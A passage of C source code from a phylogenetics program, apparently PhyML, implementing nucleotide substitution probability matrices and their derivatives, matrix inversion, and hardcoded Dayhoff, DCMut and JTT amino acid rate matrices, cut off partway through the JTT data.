if((*Pij)[i][j] < MDBL_MIN) (*Pij)[i][j] = MDBL_MIN;
}
/*********************************************************/
void dPMat_TN93(double l, double ***dPij, model *mod, double rr)
{
double kappa1,kappa2;
double de1dl,de2dl,de3dl;
double A,C,G,T,R,Y;
double Z;
A = mod->pi[0]; C = mod->pi[1]; G = mod->pi[2]; T = mod->pi[3];
R = A+G; Y = C+T;
if(mod->whichmodel < 5) { mod->lambda = 1.; }
else if(mod->whichmodel == 5)
{
mod->lambda = (Y+(R-Y)/(2.*mod->kappa))/(R-(R-Y)/(2.*mod->kappa));
}
kappa2 = mod->kappa*2./(1.+mod->lambda);
kappa1 = kappa2 * mod->lambda;
Z = 2.*A*G*kappa1+2.*C*T*kappa2+2.*R*Y;
de1dl = -rr*(kappa1*R/Z + Y/Z)*exp(-kappa1*R/Z*l*rr-Y/Z*l*rr);
de2dl = -rr*(kappa2*Y/Z + R/Z)*exp(-kappa2*Y/Z*l*rr-R/Z*l*rr);
de3dl = -rr/Z*exp(-l*rr/Z);
/*A->A*/(*dPij)[0][0] = Y*A/R*de3dl+G/R*de1dl;
/*A->C*/(*dPij)[0][1] = -C*de3dl;
/*A->G*/(*dPij)[0][2] = Y*G/R*de3dl-G/R*de1dl;
/*A->T*/(*dPij)[0][3] = -T*de3dl;
/*C->A*/(*dPij)[1][0] = -A*de3dl;
/*C->C*/(*dPij)[1][1] = R*C/Y*de3dl+T/Y*de2dl;
/*C->G*/(*dPij)[1][2] = -G*de3dl;
/*C->T*/(*dPij)[1][3] = R*T/Y*de3dl-T/Y*de2dl;
/*G->A*/(*dPij)[2][0] = Y*A/R*de3dl-A/R*de1dl;
/*G->C*/(*dPij)[2][1] = -C*de3dl;
/*G->G*/(*dPij)[2][2] = Y*G/R*de3dl+A/R*de1dl;
/*G->T*/(*dPij)[2][3] = -T*de3dl;
/*T->A*/(*dPij)[3][0] = -A*de3dl;
/*T->C*/(*dPij)[3][1] = R*C/Y*de3dl-C/Y*de2dl;
/*T->G*/(*dPij)[3][2] = -G*de3dl;
/*T->T*/(*dPij)[3][3] = R*T/Y*de3dl+C/Y*de2dl;
}
/*********************************************************/
void d2PMat_TN93(double l, double ***d2Pij, model *mod, double rr)
{
double kappa1,kappa2;
double d2e1dl2,d2e2dl2,d2e3dl2;
double A,C,G,T,R,Y;
double Z;
A = mod->pi[0]; C = mod->pi[1]; G = mod->pi[2]; T = mod->pi[3];
R = A+G; Y = C+T;
if(mod->whichmodel < 5) { mod->lambda = 1.; }
else if(mod->whichmodel == 5)
{
mod->lambda = (Y+(R-Y)/(2.*mod->kappa))/(R-(R-Y)/(2.*mod->kappa));
}
kappa2 = mod->kappa*2./(1.+mod->lambda);
kappa1 = kappa2 * mod->lambda;
Z = 2.*A*G*kappa1+2.*C*T*kappa2+2.*R*Y;
d2e1dl2 = (-rr*(kappa1*R/Z + Y/Z))*
(-rr*(kappa1*R/Z + Y/Z))*
exp(-kappa1*R/Z*l*rr-Y/Z*l*rr);
d2e2dl2 = (-rr*(kappa2*Y/Z + R/Z))*
(-rr*(kappa2*Y/Z + R/Z))*
exp(-kappa2*Y/Z*l*rr-R/Z*l*rr);
d2e3dl2 = (-rr/Z)*
(-rr/Z)*
exp(-l*rr/Z);
/*A->A*/(*d2Pij)[0][0] = Y*A/R*d2e3dl2+G/R*d2e1dl2;
/*A->C*/(*d2Pij)[0][1] = -C*d2e3dl2;
/*A->G*/(*d2Pij)[0][2] = Y*G/R*d2e3dl2-G/R*d2e1dl2;
/*A->T*/(*d2Pij)[0][3] = -T*d2e3dl2;
/*C->A*/(*d2Pij)[1][0] = -A*d2e3dl2;
/*C->C*/(*d2Pij)[1][1] = R*C/Y*d2e3dl2+T/Y*d2e2dl2;
/*C->G*/(*d2Pij)[1][2] = -G*d2e3dl2;
/*C->T*/(*d2Pij)[1][3] = R*T/Y*d2e3dl2-T/Y*d2e2dl2;
/*G->A*/(*d2Pij)[2][0] = Y*A/R*d2e3dl2-A/R*d2e1dl2;
/*G->C*/(*d2Pij)[2][1] = -C*d2e3dl2;
/*G->G*/(*d2Pij)[2][2] = Y*G/R*d2e3dl2+A/R*d2e1dl2;
/*G->T*/(*d2Pij)[2][3] = -T*d2e3dl2;
/*T->A*/(*d2Pij)[3][0] = -A*d2e3dl2;
/*T->C*/(*d2Pij)[3][1] = R*C/Y*d2e3dl2-C/Y*d2e2dl2;
/*T->G*/(*d2Pij)[3][2] = -G*d2e3dl2;
/*T->T*/(*d2Pij)[3][3] = R*T/Y*d2e3dl2+C/Y*d2e2dl2;
}
/*********************************************************/
int Matinv (double *x, int n, int m, double *space)
{
/* x[n*m] ... m>=n
*/
int i,j,k;
int *irow;
double ee, t,t1,xmax;
double det;
ee = 1.0E-20;
det = 1.0;
irow = (int *)mCalloc(n,sizeof(int));
For (i,n)
{
xmax = 0.;
for (j=i; j<n; j++)
if (xmax < fabs(x[j*m+i]))
{
xmax = fabs(x[j*m+i]);
irow[i]=j;
}
det *= xmax;
if (xmax < ee)
{
printf("\nDet becomes zero at %3d!\t\n", i+1);
return(-1);
}
if (irow[i] != i)
{
For (j,m)
{
t = x[i*m+j];
x[i*m+j] = x[irow[i]*m+j];
x[irow[i]*m+j] = t;
}
}
t = 1./x[i*m+i];
For (j,n)
{
if (j == i) continue;
t1 = t*x[j*m+i];
For(k,m) x[j*m+k] -= t1*x[i*m+k];
x[j*m+i] = -t1;
}
For(j,m) x[i*m+j] *= t;
x[i*m+i] = t;
} /* i */
for (i=n-1; i>=0; i--)
{
if (irow[i] == i) continue;
For(j,n)
{
t = x[j*m+i];
x[j*m+i] = x[j*m + irow[i]];
x[j*m + irow[i]] = t;
}
}
free(irow);
return (0);
}
/********************************************************************/
/* void PMat_Empirical(double l, model *mod, double ***Pij) */
/* */
/* Computes the substitution probability matrix */
/* from the initial substitution rate matrix and frequency vector */
/* and one specific branch length */
/* */
/* input : l , branch length */
/* input : mod , choosen model parameters, mat_Q and pi */
/* ouput : Pij , substitution probability matrix */
/* */
/* matrix P(l) is computed as follows : */
/* P(l) = exp(Q*t) , where : */
/* */
/* Q = substitution rate matrix = Vr*D*inverse(Vr) , where : */
/* */
/* Vr = right eigenvector matrix for Q */
/* D = diagonal matrix of eigenvalues for Q */
/* */
/* t = time interval = l / mr , where : */
/* */
/* mr = mean rate = branch length/time interval */
/* = sum(i)(pi[i]*p(i->j)) , where : */
/* */
/* pi = state frequency vector */
/* p(i->j) = subst. probability from i to a different state */
/* = -Q[ii] , as sum(j)(Q[ij]) +Q[ii] =0 */
/* */
/* the Taylor development of exp(Q*t) gives : */
/* P(l) = Vr*exp(D*t) *inverse(Vr) */
/* = Vr*pow(exp(D/mr),l)*inverse(Vr) */
/* */
/* for performance we compute only once the following matrixes : */
/* Vr, inverse(Vr), exp(D/mr) */
/* thus each time we compute P(l) we only have to : */
/* make 20 times the operation pow() */
/* make 2 20x20 matrix multiplications , that is : */
/* 16000 = 2x20x20x20 times the operation * */
/* 16000 = 2x20x20x20 times the operation + */
/* which can be reduced to (the central matrix being diagonal) : */
/* 8400 = 20x20 + 20x20x20 times the operation * */
/* 8000 = 20x20x20 times the operation + */
/********************************************************************/
void PMat_Empirical(double l, model *mod, double ***Pij)
{
int n = mod->ns;
int i, j, k;
double *U,*V,*R;
double *expt = (double*)calloc(n,sizeof(double));
double *uexpt = (double*)calloc(n*n,sizeof(double));
U = mod->mat_Vr;
V = mod->mat_Vi;
R = mod->vct_eDmr;
For (i,n) For (k,n)
(*Pij)[i][k] = .0;
/* compute pow(exp(D/mr),l) into mat_eDmrl */
For (k,n) expt[k] = pow(R[k], l);
/* multiply Vr*pow(exp(D/mr),l)*Vi into Pij */
For (i,n) For (k,n)
uexpt[i*n+k] = U[i*n+k] * expt[k];
For (i,n)
{
For (j,n)
{
For(k,n)
{
(*Pij)[i][j] += uexpt[i*n+k] * V[k*n+j];
}
if((*Pij)[i][j] < MDBL_MIN)
(*Pij)[i][j] = MDBL_MIN;
}
}
free(expt);
free(uexpt);
}
/*********************************************************/
void PMat(double l, model *mod, double ***Pij)
{
if(!mod->datatype)
{
if(mod->whichmodel < 3)
PMat_K80(l,mod->kappa,Pij);
else
{
if(mod->whichmodel < 7)
PMat_TN93(l,mod,Pij);
else
{
PMat_Empirical(l,mod,Pij);
}
}
}
else PMat_Empirical(l,mod,Pij);
}
/*********************************************************/
void dPMat(double l, double rr, model *mod, double ***dPij)
{
if(mod->whichmodel < 3)
dPMat_K80(l,dPij,rr,mod->kappa);
else
dPMat_TN93(l,dPij,mod,rr);
}
/*********************************************************/
void d2PMat(double l, double rr, model *mod, double ***d2Pij)
{
if(mod->whichmodel < 3)
d2PMat_K80(l,d2Pij,rr,mod->kappa);
else
d2PMat_TN93(l,d2Pij,mod,rr);
}
/*********************************************************/
int GetDaa (double *daa, double *pi, char *file_name)
{
/* Get the amino acid distance (or substitution rate) matrix
(grantham, dayhoff, jones, etc).
*/
FILE * fdaa;
int i,j, naa;
double dmax,dmin;
double sum;
naa = 20;
dmax = .0;
dmin = 1.E+40;
fdaa = (FILE *)Openfile(file_name,0);
for (i=0; i<naa; i++) for (j=0; j<i; j++) {
fscanf(fdaa, "%lf", &daa[i*naa+j]);
daa[j*naa+i]=daa[i*naa+j];
if (dmax<daa[i*naa+j]) dmax=daa[i*naa+j];
if (dmin>daa[i*naa+j]) dmin=daa[i*naa+j];
}
For(i,naa) {
if(fscanf(fdaa,"%lf",&pi[i])!=1) Exit("err aaRatefile");
}
sum = 0.0;
For(i, naa) sum += pi[i];
if (fabs(1-sum)>1e-4) {
printf("\nSum of freq. = %.6f != 1 in aaRateFile\n",sum);
exit(-1);
}
fclose (fdaa);
return (0);
}
/*********************************************************/
int Init_Qmat_Dayhoff(double *daa, double *pi)
{
/* Dayhoff's model data
* Dayhoff, M.O., Schwartz, R.M., Orcutt, B.C. (1978)
* "A model of evolutionary change in proteins."
* Dayhoff, M.O.(ed.) Atlas of Protein Sequence Structur., Vol5, Suppl3.
* National Biomedical Research Foundation, Washington DC, pp.345-352.
*/
int i,j,naa;
naa = 20;
daa[ 1*20+ 0] = 27.00; daa[ 2*20+ 0] = 98.00; daa[ 2*20+ 1] = 32.00; daa[ 3*20+ 0] = 120.00;
daa[ 3*20+ 1] = 0.00; daa[ 3*20+ 2] = 905.00; daa[ 4*20+ 0] = 36.00; daa[ 4*20+ 1] = 23.00;
daa[ 4*20+ 2] = 0.00; daa[ 4*20+ 3] = 0.00; daa[ 5*20+ 0] = 89.00; daa[ 5*20+ 1] = 246.00;
daa[ 5*20+ 2] = 103.00; daa[ 5*20+ 3] = 134.00; daa[ 5*20+ 4] = 0.00; daa[ 6*20+ 0] = 198.00;
daa[ 6*20+ 1] = 1.00; daa[ 6*20+ 2] = 148.00; daa[ 6*20+ 3] = 1153.00; daa[ 6*20+ 4] = 0.00;
daa[ 6*20+ 5] = 716.00; daa[ 7*20+ 0] = 240.00; daa[ 7*20+ 1] = 9.00; daa[ 7*20+ 2] = 139.00;
daa[ 7*20+ 3] = 125.00; daa[ 7*20+ 4] = 11.00; daa[ 7*20+ 5] = 28.00; daa[ 7*20+ 6] = 81.00;
daa[ 8*20+ 0] = 23.00; daa[ 8*20+ 1] = 240.00; daa[ 8*20+ 2] = 535.00; daa[ 8*20+ 3] = 86.00;
daa[ 8*20+ 4] = 28.00; daa[ 8*20+ 5] = 606.00; daa[ 8*20+ 6] = 43.00; daa[ 8*20+ 7] = 10.00;
daa[ 9*20+ 0] = 65.00; daa[ 9*20+ 1] = 64.00; daa[ 9*20+ 2] = 77.00; daa[ 9*20+ 3] = 24.00;
daa[ 9*20+ 4] = 44.00; daa[ 9*20+ 5] = 18.00; daa[ 9*20+ 6] = 61.00; daa[ 9*20+ 7] = 0.00;
daa[ 9*20+ 8] = 7.00; daa[10*20+ 0] = 41.00; daa[10*20+ 1] = 15.00; daa[10*20+ 2] = 34.00;
daa[10*20+ 3] = 0.00; daa[10*20+ 4] = 0.00; daa[10*20+ 5] = 73.00; daa[10*20+ 6] = 11.00;
daa[10*20+ 7] = 7.00; daa[10*20+ 8] = 44.00; daa[10*20+ 9] = 257.00; daa[11*20+ 0] = 26.00;
daa[11*20+ 1] = 464.00; daa[11*20+ 2] = 318.00; daa[11*20+ 3] = 71.00; daa[11*20+ 4] = 0.00;
daa[11*20+ 5] = 153.00; daa[11*20+ 6] = 83.00; daa[11*20+ 7] = 27.00; daa[11*20+ 8] = 26.00;
daa[11*20+ 9] = 46.00; daa[11*20+10] = 18.00; daa[12*20+ 0] = 72.00; daa[12*20+ 1] = 90.00;
daa[12*20+ 2] = 1.00; daa[12*20+ 3] = 0.00; daa[12*20+ 4] = 0.00; daa[12*20+ 5] = 114.00;
daa[12*20+ 6] = 30.00; daa[12*20+ 7] = 17.00; daa[12*20+ 8] = 0.00; daa[12*20+ 9] = 336.00;
daa[12*20+10] = 527.00; daa[12*20+11] = 243.00; daa[13*20+ 0] = 18.00; daa[13*20+ 1] = 14.00;
daa[13*20+ 2] = 14.00; daa[13*20+ 3] = 0.00; daa[13*20+ 4] = 0.00; daa[13*20+ 5] = 0.00;
daa[13*20+ 6] = 0.00; daa[13*20+ 7] = 15.00; daa[13*20+ 8] = 48.00; daa[13*20+ 9] = 196.00;
daa[13*20+10] = 157.00; daa[13*20+11] = 0.00; daa[13*20+12] = 92.00; daa[14*20+ 0] = 250.00;
daa[14*20+ 1] = 103.00; daa[14*20+ 2] = 42.00; daa[14*20+ 3] = 13.00; daa[14*20+ 4] = 19.00;
daa[14*20+ 5] = 153.00; daa[14*20+ 6] = 51.00; daa[14*20+ 7] = 34.00; daa[14*20+ 8] = 94.00;
daa[14*20+ 9] = 12.00; daa[14*20+10] = 32.00; daa[14*20+11] = 33.00; daa[14*20+12] = 17.00;
daa[14*20+13] = 11.00; daa[15*20+ 0] = 409.00; daa[15*20+ 1] = 154.00; daa[15*20+ 2] = 495.00;
daa[15*20+ 3] = 95.00; daa[15*20+ 4] = 161.00; daa[15*20+ 5] = 56.00; daa[15*20+ 6] = 79.00;
daa[15*20+ 7] = 234.00; daa[15*20+ 8] = 35.00; daa[15*20+ 9] = 24.00; daa[15*20+10] = 17.00;
daa[15*20+11] = 96.00; daa[15*20+12] = 62.00; daa[15*20+13] = 46.00; daa[15*20+14] = 245.00;
daa[16*20+ 0] = 371.00; daa[16*20+ 1] = 26.00; daa[16*20+ 2] = 229.00; daa[16*20+ 3] = 66.00;
daa[16*20+ 4] = 16.00; daa[16*20+ 5] = 53.00; daa[16*20+ 6] = 34.00; daa[16*20+ 7] = 30.00;
daa[16*20+ 8] = 22.00; daa[16*20+ 9] = 192.00; daa[16*20+10] = 33.00; daa[16*20+11] = 136.00;
daa[16*20+12] = 104.00; daa[16*20+13] = 13.00; daa[16*20+14] = 78.00; daa[16*20+15] = 550.00;
daa[17*20+ 0] = 0.00; daa[17*20+ 1] = 201.00; daa[17*20+ 2] = 23.00; daa[17*20+ 3] = 0.00;
daa[17*20+ 4] = 0.00; daa[17*20+ 5] = 0.00; daa[17*20+ 6] = 0.00; daa[17*20+ 7] = 0.00;
daa[17*20+ 8] = 27.00; daa[17*20+ 9] = 0.00; daa[17*20+10] = 46.00; daa[17*20+11] = 0.00;
daa[17*20+12] = 0.00; daa[17*20+13] = 76.00; daa[17*20+14] = 0.00; daa[17*20+15] = 75.00;
daa[17*20+16] = 0.00; daa[18*20+ 0] = 24.00; daa[18*20+ 1] = 8.00; daa[18*20+ 2] = 95.00;
daa[18*20+ 3] = 0.00; daa[18*20+ 4] = 96.00; daa[18*20+ 5] = 0.00; daa[18*20+ 6] = 22.00;
daa[18*20+ 7] = 0.00; daa[18*20+ 8] = 127.00; daa[18*20+ 9] = 37.00; daa[18*20+10] = 28.00;
daa[18*20+11] = 13.00; daa[18*20+12] = 0.00; daa[18*20+13] = 698.00; daa[18*20+14] = 0.00;
daa[18*20+15] = 34.00; daa[18*20+16] = 42.00; daa[18*20+17] = 61.00; daa[19*20+ 0] = 208.00;
daa[19*20+ 1] = 24.00; daa[19*20+ 2] = 15.00; daa[19*20+ 3] = 18.00; daa[19*20+ 4] = 49.00;
daa[19*20+ 5] = 35.00; daa[19*20+ 6] = 37.00; daa[19*20+ 7] = 54.00; daa[19*20+ 8] = 44.00;
daa[19*20+ 9] = 889.00; daa[19*20+10] = 175.00; daa[19*20+11] = 10.00; daa[19*20+12] = 258.00;
daa[19*20+13] = 12.00; daa[19*20+14] = 48.00; daa[19*20+15] = 30.00; daa[19*20+16] = 157.00;
daa[19*20+17] = 0.00; daa[19*20+18] = 28.00;
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
pi[ 0] = 0.087127; pi[ 1] = 0.040904; pi[ 2] = 0.040432; pi[ 3] = 0.046872;
pi[ 4] = 0.033474; pi[ 5] = 0.038255; pi[ 6] = 0.049530; pi[ 7] = 0.088612;
pi[ 8] = 0.033618; pi[ 9] = 0.036886; pi[10] = 0.085357; pi[11] = 0.080482;
pi[12] = 0.014753; pi[13] = 0.039772; pi[14] = 0.050680; pi[15] = 0.069577;
pi[16] = 0.058542; pi[17] = 0.010494; pi[18] = 0.029916; pi[19] = 0.064718;
return 1;
}
/*********************************************************/
int Init_Qmat_DCMut(double *daa, double *pi)
{
/*
DCMut : new implementation based on Dayhoff et al.'s raw data and amino acid mutabilities
C. Kosiol and N. Goldman
http://www.ebi.ac.uk/goldman-srv/dayhoff/
*/
int i,j,naa;
naa = 20;
daa[ 1*20+ 0] = 26.78280; daa[ 2*20+ 0] = 98.44740; daa[ 2*20+ 1] = 32.70590; daa[ 3*20+ 0] = 119.98050;
daa[ 3*20+ 1] = 0.00000; daa[ 3*20+ 2] = 893.15150; daa[ 4*20+ 0] = 36.00160; daa[ 4*20+ 1] = 23.23740;
daa[ 4*20+ 2] = 0.00000; daa[ 4*20+ 3] = 0.00000; daa[ 5*20+ 0] = 88.77530; daa[ 5*20+ 1] = 243.99390;
daa[ 5*20+ 2] = 102.85090; daa[ 5*20+ 3] = 134.85510; daa[ 5*20+ 4] = 0.00000; daa[ 6*20+ 0] = 196.11670;
daa[ 6*20+ 1] = 0.00000; daa[ 6*20+ 2] = 149.34090; daa[ 6*20+ 3] = 1138.86590; daa[ 6*20+ 4] = 0.00000;
daa[ 6*20+ 5] = 708.60220; daa[ 7*20+ 0] = 238.61110; daa[ 7*20+ 1] = 8.77910; daa[ 7*20+ 2] = 138.53520;
daa[ 7*20+ 3] = 124.09810; daa[ 7*20+ 4] = 10.72780; daa[ 7*20+ 5] = 28.15810; daa[ 7*20+ 6] = 81.19070;
daa[ 8*20+ 0] = 22.81160; daa[ 8*20+ 1] = 238.31480; daa[ 8*20+ 2] = 529.00240; daa[ 8*20+ 3] = 86.82410;
daa[ 8*20+ 4] = 28.27290; daa[ 8*20+ 5] = 601.16130; daa[ 8*20+ 6] = 43.94690; daa[ 8*20+ 7] = 10.68020;
daa[ 9*20+ 0] = 65.34160; daa[ 9*20+ 1] = 63.26290; daa[ 9*20+ 2] = 76.80240; daa[ 9*20+ 3] = 23.92480;
daa[ 9*20+ 4] = 43.80740; daa[ 9*20+ 5] = 18.03930; daa[ 9*20+ 6] = 60.95260; daa[ 9*20+ 7] = 0.00000;
daa[ 9*20+ 8] = 7.69810; daa[10*20+ 0] = 40.64310; daa[10*20+ 1] = 15.49240; daa[10*20+ 2] = 34.11130;
daa[10*20+ 3] = 0.00000; daa[10*20+ 4] = 0.00000; daa[10*20+ 5] = 73.07720; daa[10*20+ 6] = 11.28800;
daa[10*20+ 7] = 7.15140; daa[10*20+ 8] = 44.35040; daa[10*20+ 9] = 255.66850; daa[11*20+ 0] = 25.86350;
daa[11*20+ 1] = 461.01240; daa[11*20+ 2] = 314.83710; daa[11*20+ 3] = 71.69130; daa[11*20+ 4] = 0.00000;
daa[11*20+ 5] = 151.90780; daa[11*20+ 6] = 83.00780; daa[11*20+ 7] = 26.76830; daa[11*20+ 8] = 27.04750;
daa[11*20+ 9] = 46.08570; daa[11*20+10] = 18.06290; daa[12*20+ 0] = 71.78400; daa[12*20+ 1] = 89.63210;
daa[12*20+ 2] = 0.00000; daa[12*20+ 3] = 0.00000; daa[12*20+ 4] = 0.00000; daa[12*20+ 5] = 112.74990;
daa[12*20+ 6] = 30.48030; daa[12*20+ 7] = 17.03720; daa[12*20+ 8] = 0.00000; daa[12*20+ 9] = 333.27320;
daa[12*20+10] = 523.01150; daa[12*20+11] = 241.17390; daa[13*20+ 0] = 18.36410; daa[13*20+ 1] = 13.69060;
daa[13*20+ 2] = 13.85030; daa[13*20+ 3] = 0.00000; daa[13*20+ 4] = 0.00000; daa[13*20+ 5] = 0.00000;
daa[13*20+ 6] = 0.00000; daa[13*20+ 7] = 15.34780; daa[13*20+ 8] = 47.59270; daa[13*20+ 9] = 195.19510;
daa[13*20+10] = 156.51600; daa[13*20+11] = 0.00000; daa[13*20+12] = 92.18600; daa[14*20+ 0] = 248.59200;
daa[14*20+ 1] = 102.83130; daa[14*20+ 2] = 41.92440; daa[14*20+ 3] = 13.39400; daa[14*20+ 4] = 18.75500;
daa[14*20+ 5] = 152.61880; daa[14*20+ 6] = 50.70030; daa[14*20+ 7] = 34.71530; daa[14*20+ 8] = 93.37090;
daa[14*20+ 9] = 11.91520; daa[14*20+10] = 31.62580; daa[14*20+11] = 33.54190; daa[14*20+12] = 17.02050;
daa[14*20+13] = 11.05060; daa[15*20+ 0] = 405.18700; daa[15*20+ 1] = 153.15900; daa[15*20+ 2] = 488.58920;
daa[15*20+ 3] = 95.60970; daa[15*20+ 4] = 159.83560; daa[15*20+ 5] = 56.18280; daa[15*20+ 6] = 79.39990;
daa[15*20+ 7] = 232.22430; daa[15*20+ 8] = 35.36430; daa[15*20+ 9] = 24.79550; daa[15*20+10] = 17.14320;
daa[15*20+11] = 95.45570; daa[15*20+12] = 61.99510; daa[15*20+13] = 45.99010; daa[15*20+14] = 242.72020;
daa[16*20+ 0] = 368.03650; daa[16*20+ 1] = 26.57450; daa[16*20+ 2] = 227.16970; daa[16*20+ 3] = 66.09300;
daa[16*20+ 4] = 16.23660; daa[16*20+ 5] = 52.56510; daa[16*20+ 6] = 34.01560; daa[16*20+ 7] = 30.66620;
daa[16*20+ 8] = 22.63330; daa[16*20+ 9] = 190.07390; daa[16*20+10] = 33.10900; daa[16*20+11] = 135.05990;
daa[16*20+12] = 103.15340; daa[16*20+13] = 13.66550; daa[16*20+14] = 78.28570; daa[16*20+15] = 543.66740;
daa[17*20+ 0] = 0.00000; daa[17*20+ 1] = 200.13750; daa[17*20+ 2] = 22.49680; daa[17*20+ 3] = 0.00000;
daa[17*20+ 4] = 0.00000; daa[17*20+ 5] = 0.00000; daa[17*20+ 6] = 0.00000; daa[17*20+ 7] = 0.00000;
daa[17*20+ 8] = 27.05640; daa[17*20+ 9] = 0.00000; daa[17*20+10] = 46.17760; daa[17*20+11] = 0.00000;
daa[17*20+12] = 0.00000; daa[17*20+13] = 76.23540; daa[17*20+14] = 0.00000; daa[17*20+15] = 74.08190;
daa[17*20+16] = 0.00000; daa[18*20+ 0] = 24.41390; daa[18*20+ 1] = 7.80120; daa[18*20+ 2] = 94.69400;
daa[18*20+ 3] = 0.00000; daa[18*20+ 4] = 95.31640; daa[18*20+ 5] = 0.00000; daa[18*20+ 6] = 21.47170;
daa[18*20+ 7] = 0.00000; daa[18*20+ 8] = 126.54000; daa[18*20+ 9] = 37.48340; daa[18*20+10] = 28.65720;
daa[18*20+11] = 13.21420; daa[18*20+12] = 0.00000; daa[18*20+13] = 695.26290; daa[18*20+14] = 0.00000;
daa[18*20+15] = 33.62890; daa[18*20+16] = 41.78390; daa[18*20+17] = 60.80700; daa[19*20+ 0] = 205.95640;
daa[19*20+ 1] = 24.03680; daa[19*20+ 2] = 15.80670; daa[19*20+ 3] = 17.83160; daa[19*20+ 4] = 48.46780;
daa[19*20+ 5] = 34.69830; daa[19*20+ 6] = 36.72500; daa[19*20+ 7] = 53.81650; daa[19*20+ 8] = 43.87150;
daa[19*20+ 9] = 881.00380; daa[19*20+10] = 174.51560; daa[19*20+11] = 10.38500; daa[19*20+12] = 256.59550;
daa[19*20+13] = 12.36060; daa[19*20+14] = 48.50260; daa[19*20+15] = 30.38360; daa[19*20+16] = 156.19970;
daa[19*20+17] = 0.00000; daa[19*20+18] = 27.93790;
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
pi[ 0] = 0.087127; pi[ 1] = 0.040904; pi[ 2] = 0.040432; pi[ 3] = 0.046872;
pi[ 4] = 0.033474; pi[ 5] = 0.038255; pi[ 6] = 0.049530; pi[ 7] = 0.088612;
pi[ 8] = 0.033619; pi[ 9] = 0.036886; pi[10] = 0.085357; pi[11] = 0.080481;
pi[12] = 0.014753; pi[13] = 0.039772; pi[14] = 0.050680; pi[15] = 0.069577;
pi[16] = 0.058542; pi[17] = 0.010494; pi[18] = 0.029916; pi[19] = 0.064718;
return 1;
}
/*********************************************************/
int Init_Qmat_JTT(double *daa, double *pi)
{
int i,j,naa;
/* JTT's model data
* D.T.Jones, W.R.Taylor and J.M.Thornton
* "The rapid generation of mutation data matrices from protein sequences"
* CABIOS vol.8 no.3 1992 pp275-282
*/
naa = 20;
daa[ 1*20+ 0] = 58.00; daa[ 2*20+ 0] = 54.00; daa[ 2*20+ 1] = 45.00; daa[ 3*20+ 0] = 81.00;
daa[ 3*20+ 1] = 16.00; daa[ 3*20+ 2] = 528.00; daa[ 4*20+ 0] = 56.00; daa[ 4*20+ 1] = 113.00;
daa[ 4*20+ 2] = 34.00; daa[ 4*20+ 3] = 10.00; daa[ 5*20+ 0] = 57.00; daa[ 5*20+ 1] = 310.00;
daa[ 5*20+ 2] = 86.00; daa[ 5*20+ 3] = 49.00; daa[ 5*20+ 4] = 9.00; daa[ 6*20+ 0] = 105.00;
daa[ 6*20+ 1] = 29.00; daa[ 6*20+ 2] = 58.00; daa[ 6*20+ 3] = 767.00; daa[ 6*20+ 4] = 5.00;
daa[ 6*20+ 5] = 323.00; daa[ 7*20+ 0] = 179.00; daa[ 7*20+ 1] = 137.00; daa[ 7*20+ 2] = 81.00;
daa[ 7*20+ 3] = 130.00; daa[ 7*20+ 4] = 59.00; daa[ 7*20+ 5] = 26.00; daa[ 7*20+ 6] = 119.00;
daa[ 8*20+ 0] = 27.00; daa[ 8*20+ 1] = 328.00; daa[ 8*20+ 2] = 391.00; daa[ 8*20+ 3] = 112.00;
daa[ 8*20+ 4] = 69.00; daa[ 8*20+ 5] = 597.00; daa[ 8*20+ 6] = 26.00; daa[ 8*20+ 7] = 23.00;
daa[ 9*20+ 0] = 36.00; daa[ 9*20+ 1] = 22.00; daa[ 9*20+ 2] = 47.00; daa[ 9*20+ 3] = 11.00;
daa[ 9*20+ 4] = 17.00; daa[ 9*20+ 5] = 9.00; daa[ 9*20+ 6] = 12.00; daa[ 9*20+ 7] = 6.00;
daa[ 9*20+ 8] = 16.00; daa[10*20+ 0] = 30.00; daa[10*20+ 1] = 38.00; daa[10*20+ 2] = 12.00;
daa[10*20+ 3] = 7.00; daa[10*20+ 4] = 23.00; daa[10*20+ 5] = 72.00; daa[10*20+ 6] = 9.00;
daa[10*20+ 7] = 6.00; daa[10*20+ 8] = 56.00; daa[10*20+ 9] = 229.00; daa[11*20+ 0] = 35.00;
daa[11*20+ 1] = 646.00; daa[11*20+ 2] = 263.00; daa[11*20+ 3] = 26.00; daa[11*20+ 4] = 7.00;
daa[11*20+ 5] = 292.00; daa[11*20+ 6] = 181.00; daa[11*20+ 7] = 27.00; daa[11*20+ 8] = 45.00;
daa[11*20+ 9] = 21.00; daa[11*20+10] = 14.00; daa[12*20+ 0] = 54.00; daa[12*20+ 1] = 44.00;
daa[12*20+ 2] = 30.00; daa[12*20+ 3] = 15.00; daa[12*20+ 4] = 31.00; daa[12*20+ 5] = 43.00;
daa[12*20+ 6] = 18.00; daa[12*20+ 7] = 14.00; daa[12*20+ 8] = 33.00; daa[12*20+ 9] = 479.00;
daa[12*20+10] = 388.00; daa[12*20+11] = 65.00; daa[13*20+ 0] = 15.00; daa[13*20+ 1] = 5.00;
daa[13*20+ 2] = 10.00; daa[13*20+ 3] = 4.00; daa[13*20+ 4] = 78.00; daa[13*20+ 5] = 4.00;
daa[13*20+ 6] = 5.00; daa[13*20+ 7] = 5.00; daa[13*20+ 8] = 40.00; daa[13*20+ 9] = 89.00;
daa[13*20+10] = 248.00; daa[13*20+11] = 4.00; daa[13*20+12] = 43.00; daa[14*20+ 0] = 194.00;
daa[14*20+ 1] = 74.00; daa[14*20+ 2] = 15.00; daa[14*20+ 3] = 15.00; daa[14*20+ 4] = 14.00;
daa[14*20+ 5] = 164.00; daa[14*20+ 6] = 18.00; daa[14*20+ 7] = 24.00; daa[14*20+ 8] = 115.00;
daa[14*20+ 9] = 10.00; daa[14*20+10] = 102.00; daa[14*20+11] = 21.00; daa[14*20+12] = 16.00;
daa[14*20+13] = 17.00; daa[15*20+ 0] = 378.00; daa[15*20+ 1] = 101.00; daa[15*20+ 2] = 503.00;
daa[15*20+ 3] = 59.00; daa[15*20+ 4] = 223.00; daa[15*20+ 5] = 53.00; daa[15*20+ 6] = 30.00;
daa[15*20+ 7] = 201.00; daa[15*20+ 8] = 73.00; daa[15*20+ 9] = 40.00; daa[15*20+10] = 59.00;
daa[15*20+11] = 47.00; daa[15*20+12] = 29.00; daa[15*20+13] = 92.00; daa[15*20+14] = 285.00;
daa[16*20+ 0] = 475.00; daa[16*20+ 1] = 64.00; daa[16*20+ 2] = 232.00; daa[16*20+ 3] = 38.00;
